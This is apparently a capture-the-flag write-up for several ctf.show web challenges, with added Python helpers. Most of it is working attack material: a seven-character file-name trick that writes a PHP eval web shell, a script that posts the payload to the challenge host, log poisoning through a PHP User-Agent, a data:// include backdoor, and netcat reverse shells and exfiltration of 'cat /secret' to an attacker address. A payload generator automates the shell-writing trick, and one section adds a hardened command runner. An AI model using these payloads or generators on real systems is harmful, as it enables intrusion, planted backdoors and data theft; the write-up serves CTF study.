web签到 (web check-in)
View the page source:
<form class="form-horizontal" role="form" action="api/tools.php" method="post" onsubmit="return check();" >
<div class="form-group">
<label for="command" class="col-lg-2 col-sm-2 control-label">Command</label>
<div class="col-lg-10">
<input onchange="help();" id="cmd" name="cmd" type="text" class="form-control" placeholder="ls">
<p id="help" class="help-block">Only short commands are supported, and there is no output.</p>
<script>
function help(){
if(isSafe($("#cmd").val())){
$("#help").css("color","#69cf56");
$("#help").html("Submit command for execution");
}else{
$("#help").css("color","#ec1616");
$("#help").html("Command too long");
}
}
function isSafe(cmd)
{
return cmd.length<=7;
}
function check(){
if(isSafe($("#cmd").val())){
$("#help").css("color","#69cf56");
$("#help").html("Submit command for execution");
return true;
}else{
$("#help").css("color","#ec1616");
$("#help").html("Command too long");
return false ;
}
}
</script>
Hit api/tools.php directly and POST the cmd parameter; the length check above is only client-side JavaScript, but every payload below still keeps each command within 7 characters.
cmd=ls />r
Then fetch /api/r
It downloads as a file containing the listing of /:
bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
Next, write a new shell to api/1.php. Each `>name` line below creates an empty file whose name is one fragment of `echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php` ending in a backslash (the doubled backslash in the file is what the shell needs to put a single backslash into the filename). The fragments are submitted in reverse order because `ls -t>0` writes the names newest-first into the file 0, and `sh 0` then runs that listing as a script, where every trailing backslash joins a line to the next.
PoC:
payload.txt:
>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0
import requests
import time

url = "http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/tools.php"

# Submit payload.txt one line per request. The 1 s pause matters: `ls -t`
# sorts by mtime, so each file must be strictly newer than the previous one.
with open("payload.txt", "r") as f:
    for i in f:
        data = {"cmd": i.strip()}
        r = requests.post(url=url, data=data)
        time.sleep(1)
        print(r.text)

# The last two lines (`ls -t>0`, `sh 0`) should have created api/1.php
test = requests.get("http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/1.php")
if test.status_code == requests.codes.ok:
    print("you've got it!")
Fetch /api/1.php, run commands through it and read the flag.
The flag can also be read with a single 7-character nl command:
nl /*>m
after which /api/m holds the numbered contents of every readable file in /, including the flag file from the listing above.
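The payload above was written by hand. As an added example (not code from the writeup), the Python below automates the same `ls -t>0` / `sh 0` trick: it cuts an arbitrary command into fragments that still fit the 7-character limit after shell escaping, emits them in reverse order, and replays the submitted lines offline to confirm that the listing `sh 0` reads reassembles the original command. Only the 7-character limit, the command being rebuilt and payload.txt come from the page; the function names, the greedy split, the collision checks and the simulation are this example's own assumptions.

```python
"""Build and replay a payload for the `ls -t>0` / `sh 0` file-name trick.

Added example, not code from the writeup. The 7-character limit, the command
being rebuilt and PAGE_PAYLOAD are taken from the page; everything else here
(names, greedy split, simulation) is this example's own.
"""

MAX_LEN = 7  # longest command the challenge accepts

# Characters that need a backslash to survive inside a `>name` redirection.
# '/' and newlines cannot appear in a filename at all, so they are rejected.
SPECIAL = set(" \t|&;<>()$`\\\"'*?[]#~={}")


def escape(fragment):
    """Backslash-escape a fragment so `>` + escape(fragment) creates exactly that file."""
    return "".join("\\" + c if c in SPECIAL else c for c in fragment)


def split_command(cmd, max_len=MAX_LEN):
    """Greedily cut cmd into fragments whose submitted line fits in max_len chars.

    A line is '>' plus the escaped fragment plus two backslash characters
    (the shell reduces those to one trailing backslash in the filename), so an
    escaped fragment may use at most max_len - 3 characters.
    """
    if not cmd:
        raise ValueError("empty command")
    if "/" in cmd or "\n" in cmd:
        raise ValueError("'/' and newline cannot be stored in a filename")
    budget = max_len - 3
    if budget < 2:
        raise ValueError("max_len too small to hold one escaped character")
    fragments, current = [], ""
    for ch in cmd:
        if current and len(escape(current + ch)) > budget:
            fragments.append(current)
            current = ""
        current += ch
    fragments.append(current)
    # `>name` on an existing name truncates it and refreshes its mtime, which
    # would move that fragment in the `ls -t` order; '.' and '..' cannot be
    # created, and '0' is overwritten by the listing itself.
    if len(set(fragments)) != len(fragments):
        raise ValueError("duplicate fragment; choose a different split")
    if any(f in (".", "..", "0") for f in fragments):
        raise ValueError("fragment collides with '.', '..' or the listing file '0'")
    return fragments


def payload_lines(cmd, max_len=MAX_LEN):
    """Commands to submit, in order. Fragments go in reverse because `ls -t`
    lists the newest file first; all but the last get the continuation backslash."""
    fragments = split_command(cmd, max_len)
    lines = []
    for idx in range(len(fragments) - 1, -1, -1):
        last = idx == len(fragments) - 1
        line = ">" + escape(fragments[idx]) + ("" if last else "\\\\")
        assert len(line) <= max_len
        lines.append(line)
    return lines + ["ls -t>0", "sh 0"]


def _filename(line):
    """Filename a `>...` line creates (undo the shell's backslash escapes)."""
    chars, out = iter(line[1:]), []
    for c in chars:
        out.append(next(chars, "") if c == "\\" else c)
    return "".join(out)


def simulate(lines):
    """Replay the lines as the server's shell would; return the script `sh 0` runs."""
    created = [_filename(l) for l in lines if l.startswith(">")]
    # `ls -t>0`: the shell creates `0` before ls runs, so it heads the listing,
    # followed by the fragment files newest-first.
    listing = "\n".join(["0"] + created[::-1]) + "\n"
    # sh treats backslash-newline as a line continuation
    return listing.replace("\\\n", "")


# payload.txt from the writeup, for comparison with the generated one
PAGE_PAYLOAD = [
    r">hp", r">1.p\\", r">d\>\\", r">\ -\\", r">e64\\", r">bas\\", r">7\|\\",
    r">XSk\\", r">Fsx\\", r">dFV\\", r">kX0\\", r">bCg\\", r">XZh\\", r">AgZ\\",
    r">waH\\", r">PD9\\", r">o\ \\", r">ech\\", "ls -t>0", "sh 0",
]

if __name__ == "__main__":
    cmd = "echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php"
    for line in payload_lines(cmd):
        print(line)
    print(simulate(payload_lines(cmd)))
```

The generated payload needs 14 fragment files instead of the hand-written 18 because it packs 4 escaped characters per line. The first line `sh 0` executes is the listing file's own name, `0`, which fails with "not found" and is skipped, as are any older files (such as `r` from the directory listing step) that land at the end; neither breaks the reconstructed command. When sending the lines for real, keep the 1 s pause between requests so every file gets a distinct mtime.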
easy_calc
<?php
if(check($code)){
    eval('$result='."$code".";");
    echo($result);
}
function check(&$code){
    $num1=$_POST['num1'];
    $symbol=$_POST['symbol'];
    $num2=$_POST['num2'];
    if(!isset($num1) || !isset($num2) || !isset($symbol) )
    {
        return false;
    }
    if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol))
    {
        return false;
    }
    if(preg_match("/^[\+\-\*\/]$/", $symbol))
    {
        $code = "$num1$symbol$num2";
        return true;
    }
    return false;
}
POST /calc.php HTTP/1.1
Host: b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Content-Length: 24
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Referer: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
num1=1&symbol=%2B&num2=3
The statement that finally runs is `$result=$num1$symbol$num2;`, and `(` is blacklisted, so no function can be called. What remains are language constructs that need no parentheses, such as include, require and echo, so try including a file.
Tested locally first:
$num1='include "C:\Users\admin\Desktop\ip.txt";1';
$symbol="+";
$num2="2";
ip.txt is echoed back.
num1=include "/etc/passwd";1&symbol=%2B&num2=2
passwd is echoed back.
Including the log file:
num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2
Final request, with PHP placed in the User-Agent so that it lands in the nginx access log and is executed when the log is included:
POST /calc.php HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 60
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: <?php system('cat /*'); ?>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2
Executing code through the data:// wrapper instead (include only accepts data: when allow_url_include is On):
<?php eval($_GET[1]);
PD9waHAgZXZhbCgkX0dFVFsxXSk7
Dropping `?>` is what keeps the base64 clean: with ` ?>` appended the encoding ends in `+`, which a form body decodes to a space, and with `?>` alone it ends in `=` padding, which the blacklist rejects. The 21-byte source above is a multiple of 3, so it encodes with no padding at all.
Payload:
num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1
POST /calc.php?1=system('cat+/secret')%3b HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 88
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1
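To test easy_calc payloads offline, here is an added example (not code from the challenge or the writeup) that re-implements check() in Python, builds the include parameters used for /etc/passwd and the access log above, and encodes PHP for the data:// wrapper so that the base64 contains no `=` (blacklisted) and, where a byte alignment allows it, no `+` (decoded to a space in a raw form body). The helper names and the leading-space alignment trick are this example's own.

```python
"""Offline model of easy_calc's check() plus payload builders.

Added example, not code from the challenge or the writeup. The blacklist, the
eval('$result=' . $code . ';') sink and the include trick are from the page;
the function names and the alignment trick are this example's own.
"""
import base64
import re

# Same character set as the PHP preg_match in check()
BLACKLIST = re.compile(r"[!@#$%^&(_={'<>?|`~\[]")
SYMBOL = re.compile(r"^[+\-*/]$")


def check(num1, symbol, num2):
    """Return the code eval() would run, or None when check() rejects the input."""
    if num1 is None or symbol is None or num2 is None:
        return None
    if BLACKLIST.search(num1 + num2 + symbol):
        return None
    if not SYMBOL.match(symbol):
        return None
    return "$result=" + num1 + symbol + num2 + ";"


def include_params(target):
    """num1/symbol/num2 that turn the calculator into `include "<target>";1+2;`.

    The `;1` after the include and the `+2` from symbol/num2 keep the final
    statement syntactically valid, so no parse error stops the include.
    """
    return ('include "%s";1' % target, "+", "2")


def php_to_data_uri(php_source):
    """data:// URI whose base64 has no '=' and, when possible, no '+'.

    Padding the source with spaces to a multiple of 3 bytes removes the '='
    padding. Prepending 0..2 spaces (emitted as harmless output before <?php)
    shifts the byte alignment and may remove a '+'. '/' is left alone: the
    blacklist allows it. If every alignment yields a '+', the unshifted form
    is returned and the caller must percent-encode it.
    """
    fallback = None
    for lead in range(3):
        src = b" " * lead + php_source.encode()
        src += b" " * (-len(src) % 3)
        b64 = base64.b64encode(src).decode()
        assert "=" not in b64
        if "+" not in b64:
            return "data://text/plain;base64," + b64
        fallback = fallback or b64
    return "data://text/plain;base64," + fallback


def decode_data_uri(uri):
    """Bytes PHP would read from the data:// URI, for checking a payload."""
    return base64.b64decode(uri.split(",", 1)[1])


if __name__ == "__main__":
    uri = php_to_data_uri("<?php eval($_GET[1]);")
    print(check(*include_params(uri)))
    print(check("system('id')", "+", "1"))  # rejected: '(' and "'" are blacklisted
```

Running check() over candidate inputs before sending them saves a round trip per guess; the blacklist leaves `"`, `;`, `:` and `/` available, which is exactly what a quoted path or data: URI needs.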
easy_cmd
<?php
error_reporting(0);
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){
    exec(escapeshellcmd($cmd));
}
?>
The regex requires cmd to start with ping, ls, nc or ifconfig; the string is then passed through escapeshellcmd and executed.
<?php
$cmd="nc -e /bin/bash ip port";
if(preg_match("/^\b(ping|ls|nc|ifconfig|ipconfig)\b/",$cmd))
{
    $out=escapeshellcmd($cmd);
    print_r($out);
}
nc -e /bin/bash ip port
escapeshellcmd leaves this command untouched. It only backslash-escapes shell metacharacters (&#;`|*?~<>^()[]{}$\, newline, 0xFF, and quotes without a partner), so chaining a second command is blocked, but nc still receives whatever arguments we choose, including -e.
So try an nc reverse shell:
nc -e /bin/bash ip port
nc ip port -e /bin/bash
The shell here drops within a second of connecting, so try exfiltrating command output through nc instead:
cmd=nc IP port -e ls /
cmd=nc IP port -e cat /secret
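As an added example (not the challenge's code), the Python below ports escapeshellcmd() and the regex gate to show exactly why `nc -e /bin/bash ip port` passes through unchanged while `ls; id` does not, and places a hardened runner beside it that parses the command into argv, allows only known programs with validated arguments and never goes through a shell. The allowlist, the validators and the helper names are this example's own choices.

```python
"""escapeshellcmd() argument injection: vulnerable gate beside a hardened one.

Added example, not the challenge's code. The regex and the escapeshellcmd
semantics (PHP manual) mirror the page; the allowlist, validators and names
are this example's own.
"""
import re
import shlex
import subprocess

GATE = re.compile(r"^\b(ping|ls|nc|ifconfig)\b")

# Characters escapeshellcmd() prefixes with a backslash (PHP manual);
# a quote is only escaped when it has no partner later in the string.
_META = set("&#;`|*?~<>^()[]{}$\\\n\xff")


def escapeshellcmd(s):
    """Python port of PHP's escapeshellcmd() on POSIX."""
    out, pending = [], None  # pending: quote char of an open pair
    for i, c in enumerate(s):
        if c in "'\"":
            if pending is None and s.find(c, i + 1) != -1:
                pending = c
            elif pending == c:
                pending = None
            else:
                out.append("\\")
            out.append(c)
        elif c in _META:
            out.append("\\" + c)
        else:
            out.append(c)
    return "".join(out)


def vulnerable_command(cmd):
    """What easy_cmd hands to exec(): None if the regex rejects, else the escaped string."""
    if not GATE.match(cmd):
        return None
    return escapeshellcmd(cmd)


# Hardened version: parse into argv, allow only known programs, validate every
# argument against a pattern, reject option-like arguments, and never use a shell.
_HOST = re.compile(r"^[A-Za-z0-9.-]{1,253}$")
_PATH = re.compile(r"^(?!.*\.\.)[A-Za-z0-9_./-]{1,255}$")
ALLOWED = {
    # program: (fixed argv prefix, pattern each user argument must match, max arguments)
    "ping": (["ping", "-c", "3", "--"], _HOST, 1),
    "ls": (["ls", "--"], _PATH, 1),
    "ifconfig": (["ifconfig"], None, 0),
}
# nc is deliberately absent: with user-chosen arguments (-e, -c) it cannot be made safe.


def hardened_argv(cmd):
    """argv list for subprocess.run(argv) (no shell), or ValueError."""
    argv = shlex.split(cmd)
    if not argv or argv[0] not in ALLOWED:
        raise ValueError("command not allowed")
    prefix, pattern, max_args = ALLOWED[argv[0]]
    args = argv[1:]
    if len(args) > max_args:
        raise ValueError("too many arguments")
    for a in args:
        if a.startswith("-") or not pattern.match(a):
            raise ValueError("bad argument: %r" % a)
    return prefix + args


def run_hardened(cmd):
    """Execute an allowed command without a shell and return the CompletedProcess."""
    return subprocess.run(hardened_argv(cmd), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    print(vulnerable_command("nc -e /bin/bash 10.0.0.1 4444"))  # passes unchanged
    print(vulnerable_command("ls; id"))  # 'ls\; id': the ';' is neutralised
    print(hardened_argv("ping 127.0.0.1"))
```

The lesson is the one the challenge illustrates: escapeshellcmd() protects the shell's grammar, not the program's. Any program in the allowlist that can spawn another process from an argument (nc -e, find -exec, tar --checkpoint-action, and so on) turns an "escaped" command into code execution, so the fix is to validate arguments per program rather than to escape the line.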
easy_sql
SQL injection. Started by fuzzing which keywords the WAF blocks; not solved yet.